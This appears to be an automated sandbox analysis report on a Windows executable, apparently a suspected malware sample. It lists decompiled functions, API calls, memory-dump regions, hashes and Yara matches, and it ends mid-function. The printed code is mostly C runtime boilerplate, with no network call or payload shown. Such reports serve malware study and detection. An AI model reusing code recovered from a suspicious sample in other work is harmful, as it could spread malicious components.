API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 56411ebd0f8801349df1e46e72ce85dfc56ad31ca120a804b04ccc5bc591eade
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 56D0123214512877D7002AA4DC09BCD7B1CDF05F66F008011FB0DD9080C770964046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0040231F Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040231F(void** _a4) {
				void* _t3;
				int _t4;

				_t3 =  *_a4;
				if(_t3 != 0) {
					_t4 = FindCloseChangeNotification(_t3); // executed
					return _t4;
				}
				return _t3;
			}

0x00402323
0x00402327
0x0040232a
0x00000000
0x0040232a
0x00402330

APIs

FindCloseChangeNotification.KERNELBASE(?,0040267F,00000000), ref: 0040232A

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 98d22ccc84d33c0d9405aad136aee7577730221b76a145ed98244b91080487fe
Instruction ID: f8f344954c4c9339b56e388b28d6b5b286edc524f0a8a5aff3952cb14fe0b5e1
Opcode Fuzzy Hash: 98d22ccc84d33c0d9405aad136aee7577730221b76a145ed98244b91080487fe
Instruction Fuzzy Hash: D9B092706042009BDE00CB64CA4CA4B33E8AB4070070444A5B800D72A0C778EC00CA28

Uniqueness

Uniqueness Score: -1.00%

Function 004011A4 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004011A4(long _a4, intOrPtr* _a8) {
				void* _t6;

				_t6 = RtlAllocateHeap( *( *_a8 + 0x18), 8, _a4); // executed
				return _t6;
			}

0x004011b3
0x004011b9

APIs

RtlAllocateHeap.NTDLL(?,00000008,?,00402BD6,00000005,?,00000001,?,?,?,0040351A,?,?,?,00000000,00000034), ref: 004011B3

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 52762625adc59b72b0909801b3259649f680ae05bcde04aaf69b41813fdb88b5
Instruction ID: 5b271eb55598ba870b5c8a9ae93fc98dc485251f25d3dd32396ea559e23a3a45
Opcode Fuzzy Hash: 52762625adc59b72b0909801b3259649f680ae05bcde04aaf69b41813fdb88b5
Instruction Fuzzy Hash: B0C04834284204AFCE018F04D948E0ABBA1FB98701F0084A4B8888B2B0C731EC14EB41

Uniqueness

Uniqueness Score: -1.00%

Function 004011BA Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004011BA(void* _a4, intOrPtr* _a8) {
				char _t6;

				_t6 = RtlFreeHeap( *( *_a8 + 0x18), 0, _a4); // executed
				return _t6;
			}

0x004011c9
0x004011cf

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,00402C96,?,?,00000002,00000000,?,00403530,?), ref: 004011C9

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ae4edbc26785cb9bed513f05b99659a5cb994e9ed7ac4180349c48926112dc50
Instruction ID: 6baa6ca350024d5792d49a872ce978b644092d365a8d950a3e199912c1b239ad
Opcode Fuzzy Hash: ae4edbc26785cb9bed513f05b99659a5cb994e9ed7ac4180349c48926112dc50
Instruction Fuzzy Hash: 36C04834284200AFCE018F04CE48F09BBE1EB88700F0084A8B8998B2B0C331EC10EA45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 023D3374 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 193memorysynchronizationCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00100000,01000000), ref: 023D3392
VirtualQuery.KERNEL32(00402076,?,0000001C), ref: 023D33A6
GetModuleHandleW.KERNEL32(00000000), ref: 023D33B1
OutputDebugStringA.KERNEL32(0041B4E0), ref: 023D33C2
WaitForSingleObject.KERNEL32(00000000,840FDB85), ref: 023D34C8
HeapFree.KERNEL32(?,00000000,00000000), ref: 023D34ED
HeapFree.KERNEL32(?,00000000,00000000), ref: 023D352E
HeapDestroy.KERNEL32(?), ref: 023D3537
GetProcessHeap.KERNEL32(00000000,0046CC20), ref: 023D359C
HeapFree.KERNEL32(00000000), ref: 023D35A3

Strings

; @, xrefs: 023D3521
, xrefs: 023D3517

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CreateDebugDestroyHandleModuleObjectOutputProcessQuerySingleStringVirtualWait
String ID: $; @
API String ID: 2685627074-3822423859
Opcode ID: 972650ca1a8441451717cbed8f16781739640da75c1d5535ba19ec1b3d08962d
Instruction ID: 721b169edd2a9807911cea8405ea906cbd821ad1a57329adb661db81dff8d23c
Opcode Fuzzy Hash: 972650ca1a8441451717cbed8f16781739640da75c1d5535ba19ec1b3d08962d
Instruction Fuzzy Hash: B8712A71A01304AFDB20CF65D984B9EBBF5FF08704F1084AAE959A7290D774E904CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004179F7 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E004179F7(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x46cf38 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x46cf44; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x46cf3c; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x46cf40; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x46cf38(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x46cc8c < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
					if( *0x46cf48() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x46cf38 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x46cf3c = GetProcAddress(_t31, "GetActiveWindow");
					 *0x46cf40 = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x46cc80 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x46cf48 = _t26;
						if(_t26 != 0) {
							 *0x46cf44 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}

0x004179fe
0x00417a00
0x00417a08
0x00417a77
0x00417a77
0x00417a7e
0x00417abc
0x00417abc
0x00417ac3
0x00417ac7
0x00417acb
0x00417acd
0x00417ad4
0x00417ad9
0x00417ad9
0x00417ad4
0x00417acb
0x00417adb
0x00000000
0x00417ae5
0x00417a80
0x00417a84
0x00417aa3
0x00417aaa
0x00417ab6
0x00417aac
0x00417aac
0x00417aac
0x00000000
0x00417aaa
0x00417a89
0x00417a8a
0x00417a8f
0x00417a90
0x00417a92
0x00417a9b
0x00000000
0x00000000
0x00000000
0x00000000
0x00417a9b
0x00417a15
0x00417a19
0x00417ab2
0x00000000
0x00417ab2
0x00417a2b
0x00417a2f
0x00417a34
0x00000000
0x00417a36
0x00417a44
0x00417a52
0x00417a57
0x00417a5f
0x00417a63
0x00417a68
0x00417a72
0x00417a72
0x00417a68
0x00000000
0x00417a57

APIs

LoadLibraryA.KERNEL32(user32.dll,0046A0A8,?,?), ref: 00417A0F
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00417A2B
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00417A3C
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00417A49
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00417A5F
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00417A70

Strings

GetUserObjectInformationA, xrefs: 00417A59
GetProcessWindowStation, xrefs: 00417A6A
GetLastActivePopup, xrefs: 00417A3E
GetActiveWindow, xrefs: 00417A36
MessageBoxA, xrefs: 00417A25
user32.dll, xrefs: 00417A0A

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
API String ID: 2238633743-1612076079
Opcode ID: 6fcd358e16a8054d370321a0fe2852baab6f2f3698cf6c1fac5097fc0e419e1a
Instruction ID: aa1f2baa016e6507c591c742d8328a3852ccf2fd5afb6b02bcfab1ed02f84f35
Opcode Fuzzy Hash: 6fcd358e16a8054d370321a0fe2852baab6f2f3698cf6c1fac5097fc0e419e1a
Instruction Fuzzy Hash: AE215230604305AADB15DB749CC4ABF3AB99F04780B04803BE945D22D1FBF889819BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00414BB6 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 93%

			_entry_(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t35;
				struct HINSTANCE__* _t38;
				void* _t40;
				intOrPtr _t47;
				signed int _t50;
				intOrPtr _t52;
				signed int _t63;
				signed int _t64;
				long _t68;
				intOrPtr* _t78;
				long _t79;
				struct _OSVERSIONINFOA* _t85;
				signed int _t87;
				void* _t90;
				struct _OSVERSIONINFOA* _t91;

				_push(0x60);
				E004161C8(__ebx, __edi, __esi);
				E00416320(0x94, __ecx, 0x469bf8);
				 *(_t90 - 0x18) = _t91;
				_t85 = _t91;
				_t85->dwOSVersionInfoSize = 0x94;
				GetVersionExA(_t85);
				_t68 = _t85->dwPlatformId;
				 *0x46cc80 = _t68;
				_t35 = _t85->dwMajorVersion;
				 *0x46cc8c = _t35;
				_t79 = _t85->dwMinorVersion;
				 *0x46cc90 = _t79;
				_t87 = _t85->dwBuildNumber & 0x00007fff;
				 *0x46cc84 = _t87;
				if(_t68 != 2) {
					 *0x46cc84 = _t87 | 0x00008000;
				}
				 *0x46cc88 = (_t35 << 8) + _t79;
				_t38 = GetModuleHandleA(0);
				if(_t38->i != 0x5a4d) {
					L6:
					 *(_t90 - 0x1c) = 0;
				} else {
					_t78 =  *((intOrPtr*)(_t38 + 0x3c)) + _t38;
					if( *_t78 != 0x4550) {
						goto L6;
					} else {
						_t63 =  *(_t78 + 0x18) & 0x0000ffff;
						if(_t63 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t78 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t78 + 0x74)) <= 0xe) {
								goto L6;
							} else {
								_t64 = 0;
								__eflags =  *(_t78 + 0xe8);
								goto L11;
							}
						} else {
							if(_t63 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t78 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t78 + 0x84)) <= 0xe) {
									goto L6;
								} else {
									_t64 = 0;
									__eflags =  *(_t78 + 0xf8);
									L11:
									_t14 = __eflags != 0;
									__eflags = _t14;
									 *(_t90 - 0x1c) = _t64 & 0xffffff00 | _t14;
								}
							} else {
								goto L6;
							}
						}
					}
				}
				if(E00416177(1) == 0) {
					E00414B92(0x1c);
				}
				_t40 = E00414F69();
				_t101 = _t40;
				if(_t40 == 0) {
					E00414B92(0x10);
				}
				E004160D5(_t101);
				 *(_t90 - 4) = 0;
				if(E00415ED7() < 0) {
					E00414B6D(0x1b);
				}
				 *0x46d490 = GetCommandLineA();
				 *0x46cc60 = E00415DB5();
				if(E00415D13() < 0) {
					E00414B6D(8);
				}
				if(E00415AE0() < 0) {
					E00414B6D(9);
				}
				_t47 = E00415602(1);
				 *((intOrPtr*)(_t90 - 0x28)) = _t47;
				if(_t47 != 0) {
					E00414B6D(_t47);
				}
				 *(_t90 - 0x44) = 0;
				GetStartupInfoA(_t90 - 0x70);
				 *((intOrPtr*)(_t90 - 0x20)) = E00415A83();
				if(( *(_t90 - 0x44) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t90 - 0x40) & 0x0000ffff;
				}
				_push(_t50);
				_push( *((intOrPtr*)(_t90 - 0x20)));
				_push(0);
				_t52 = E00402750(GetModuleHandleA(0));
				_t83 = _t52;
				 *((intOrPtr*)(_t90 - 0x2c)) = _t52;
				if( *(_t90 - 0x1c) == 0) {
					E0041572F(_t83);
				}
				E00415751();
				 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
				return E00416203(_t83);
			}

0x00414bb6
0x00414bbd
0x00414bc9
0x00414bce
0x00414bd1
0x00414bd3
0x00414bd6
0x00414bdc
0x00414bdf
0x00414be5
0x00414be8
0x00414bed
0x00414bf0
0x00414bf9
0x00414bff
0x00414c08
0x00414c10
0x00414c10
0x00414c1b
0x00414c29
0x00414c30
0x00414c51
0x00414c51
0x00414c32
0x00414c35
0x00414c3d
0x00000000
0x00414c3f
0x00414c3f
0x00414c48
0x00414c69
0x00414c6d
0x00000000
0x00414c6f
0x00414c6f
0x00414c71
0x00000000
0x00414c71
0x00414c4a
0x00414c4f
0x00414c56
0x00414c5d
0x00000000
0x00414c5f
0x00414c5f
0x00414c61
0x00414c77
0x00414c77
0x00414c77
0x00414c7a
0x00414c7a
0x00000000
0x00000000
0x00000000
0x00414c4f
0x00414c48
0x00414c3d
0x00414c87
0x00414c8b
0x00414c90
0x00414c91
0x00414c96
0x00414c98
0x00414c9c
0x00414ca1
0x00414ca2
0x00414ca7
0x00414cb1
0x00414cb5
0x00414cba
0x00414cc1
0x00414ccb
0x00414cd7
0x00414cdb
0x00414ce0
0x00414ce8
0x00414cec
0x00414cf1
0x00414cf4
0x00414cfa
0x00414cff
0x00414d02
0x00414d07
0x00414d08
0x00414d0f
0x00414d1a
0x00414d21
0x00414d2b
0x00414d23
0x00414d23
0x00414d23
0x00414d2c
0x00414d2d
0x00414d30
0x00414d35
0x00414d3a
0x00414d3c
0x00414d42
0x00414d45
0x00414d45
0x00414d4a
0x00414d7c
0x00414d8a

APIs

GetVersionExA.KERNEL32(?,00469BF8,00000060), ref: 00414BD6
GetModuleHandleA.KERNEL32(00000000,?,00469BF8,00000060), ref: 00414C29
_fast_error_exit.LIBCMT ref: 00414C8B
_fast_error_exit.LIBCMT ref: 00414C9C
GetCommandLineA.KERNEL32(?,00469BF8,00000060), ref: 00414CBB
GetStartupInfoA.KERNEL32(?), ref: 00414D0F
__wincmdln.LIBCMT ref: 00414D15
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00414D32

Strings

3y, xrefs: 00414CC1

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: HandleModule_fast_error_exit$CommandInfoLineStartupVersion__wincmdln
String ID: 3y
API String ID: 3897392166-448672602
Opcode ID: 17e4b72c97209c29879d0914473b3bc1412d287defca0a8a261940c235b77afe
Instruction ID: ecae9016368fcb2611ce9416a7a83c3328e709234c638b951964ede6c861700b
Opcode Fuzzy Hash: 17e4b72c97209c29879d0914473b3bc1412d287defca0a8a261940c235b77afe
Instruction Fuzzy Hash: 0341A470D017148ADB20AF76984AAEE77A4AFC4714F11443FE4189B291EB7CD8C2DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 0041A38E Relevance: 7.6, APIs: 5, Instructions: 92
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041A38E(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E00416320(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x46cc80; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x46cc80; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}

0x0041a399
0x0041a39a
0x0041a39f
0x0041a3b0
0x0041a429
0x0041a429
0x0041a3b2
0x0041a3b2
0x0041a3b9
0x0041a3bf
0x0041a3c2
0x0041a3ce
0x0041a3d5
0x0041a3e0
0x0041a3e4
0x0041a3e7
0x00000000
0x0041a3e9
0x0041a3ec
0x0041a44a
0x00000000
0x0041a3ee
0x0041a3ee
0x0041a3f6
0x0041a40c
0x0041a412
0x00000000
0x0041a414
0x0041a418
0x0041a41b
0x0041a41e
0x0041a427
0x0041a42f
0x0041a431
0x0041a431
0x0041a43d
0x0041a443
0x0041a44d
0x0041a450
0x0041a463
0x00000000
0x00000000
0x00000000
0x0041a420
0x0041a422
0x0041a422
0x0041a41e
0x00000000
0x0041a412
0x00000000
0x0041a3f6
0x0041a3ec
0x0041a3e7
0x0041a469
0x0041a470

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0041A3A8
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0041A3B9
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0041A3FF
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0041A43D
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0041A463

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Virtual$Query$AllocInfoProtectSystem
String ID:
API String ID: 4136887677-0
Opcode ID: 3d7cca9da54f2f233365078a82cf6a600b4ea1bc0c2da424d6662ba6b9a61240
Instruction ID: 128de391436aecbe1c19f636a12ad642b346972aed7f310ea3be48f4d3bcd342
Opcode Fuzzy Hash: 3d7cca9da54f2f233365078a82cf6a600b4ea1bc0c2da424d6662ba6b9a61240
Instruction Fuzzy Hash: FE31D732D0121DEBDF10CBA4ED48AEE7BB8EB08354F144167E901E7250D7B88E95DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00419F6D Relevance: 7.5, APIs: 5, Instructions: 32
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F6D() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x46c5a0; // 0xfb090c04
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x46c5a0 = _t22;
					if(_t22 == 0) {
						 *0x46c5a0 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}

0x00419f73
0x00419f7a
0x00419f88
0x00419f94
0x00419f9c
0x00419fa4
0x00419fb0
0x00419fb9
0x00419fbc
0x00419fbe
0x00419fc4
0x00419fc6
0x00419fc6
0x00000000
0x00419fd0
0x00419fd2

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00419F88
GetCurrentProcessId.KERNEL32 ref: 00419F94
GetCurrentThreadId.KERNEL32 ref: 00419F9C
GetTickCount.KERNEL32 ref: 00419FA4
QueryPerformanceCounter.KERNEL32(?), ref: 00419FB0

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 173bdef380c8610e7581f8fd7bc009a816ec993ed89b2a8136167583bd8596ce
Instruction ID: 89f3d97a97289b9c1eeeb75b2c775e9d94a141cc9109f5a5a7d1ea47ba20461e
Opcode Fuzzy Hash: 173bdef380c8610e7581f8fd7bc009a816ec993ed89b2a8136167583bd8596ce
Instruction Fuzzy Hash: 8CF09C71D01128ABCB109BF4ED485DFB7F8FB482547854566D812E7110EB74A951CA89

Uniqueness

Uniqueness Score: -1.00%

Function 023D092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 023D095F
GetProcAddress., xrefs: 023D09DC, 023D09DF, 023D09E4
l, xrefs: 023D0966

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 5b6bd55f6f919b928c6b7b09ba6598d672bef0367842a785d544d999132876dc
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 22316AB6900609DFDB14CF99D880AAEBBF9FF48724F14404AD841A7311D7B1EA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 023EB360 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 023EB380

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: cdd95cdd843b3136e8676d83f7b4994954a05154b68807ffc08cf9400dc89a2a
Instruction ID: 2bb9fb287144e9a9876a62e163ed5d23bce167477444d35b436c8f148fb1123d
Opcode Fuzzy Hash: cdd95cdd843b3136e8676d83f7b4994954a05154b68807ffc08cf9400dc89a2a
Instruction Fuzzy Hash: 3FE0923090420CBBDF12DBA4DD01BDDB7BABF04318F404265E652DA1D0EB70D6088B55

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4F9 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A4F9(int _a4) {
				intOrPtr _v8;
				char _v10;
				char _v16;
				void* __ebp;
				intOrPtr _t7;
				signed int _t9;
				signed int _t11;
				void* _t13;
				void* _t16;

				_t7 =  *0x46c5a0; // 0xfb090c04
				_v8 = _t7;
				_v10 = 0;
				_t9 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
				if(_t9 != 0) {
					_t11 = E0041A471(_t13, _t16,  &_v16);
				} else {
					_t11 = _t9 | 0xffffffff;
				}
				return E00417786(_t11, _v8);
			}

0x0041a4ff
0x0041a506
0x0041a515
0x0041a519
0x0041a521
0x0041a52c
0x0041a523
0x0041a523
0x0041a523
0x0041a53b

APIs

GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 0041A519

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6de31847749bf8cdffe37e20a989dbc8656e2c410a4c37db9a6bb885f42a0e6e
Instruction ID: b6ea87773f6c98ffc77a3355ddc294501689696aca9ab7a0aa2f3d76565cc107
Opcode Fuzzy Hash: 6de31847749bf8cdffe37e20a989dbc8656e2c410a4c37db9a6bb885f42a0e6e
Instruction Fuzzy Hash: D0E09230909248BBCB00DBE4D945AED77B9AB04318F00416AF552D61D0E7B4AA50875A

Uniqueness

Uniqueness Score: -1.00%

Function 02716E4B Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.379716647.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47a69a5841d24d2360c802bc7eb7cb2a6e4f1440796bf4c6e5a2234938cd9116
Instruction ID: 8177266d77e60962830c16d5ab622e5df6d1d647ad56941401de80456cfc3b82
Opcode Fuzzy Hash: 47a69a5841d24d2360c802bc7eb7cb2a6e4f1440796bf4c6e5a2234938cd9116
Instruction Fuzzy Hash: 49E16B6284E7C29FDB278B744CB9095BFB16D2320475D89DFC4C24B8E3E248A15AD793

Uniqueness

Uniqueness Score: -1.00%

Function 023E707B Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cabf6022af048575c402c7c6e354eb9f8ff42dcc324ea626b3341853ec57442c
Instruction ID: 2ae3cb021e672c38eb3c34a6d6f0213ed7703820207936d2039e8b7499b2c01a
Opcode Fuzzy Hash: cabf6022af048575c402c7c6e354eb9f8ff42dcc324ea626b3341853ec57442c
Instruction Fuzzy Hash: 74217472900314ABCB14EF68CC809A7FBA5FF49350B468569D95A9B285E730F919CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00416214 Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00416214(signed int* __eax, void* __ebx, signed int __edx, char _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				signed int _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00418912(_t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E004189BE(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E004188D0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00418912(_t66, 0);
										_t99 = _t99 + 0xc;
										E004189A6(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
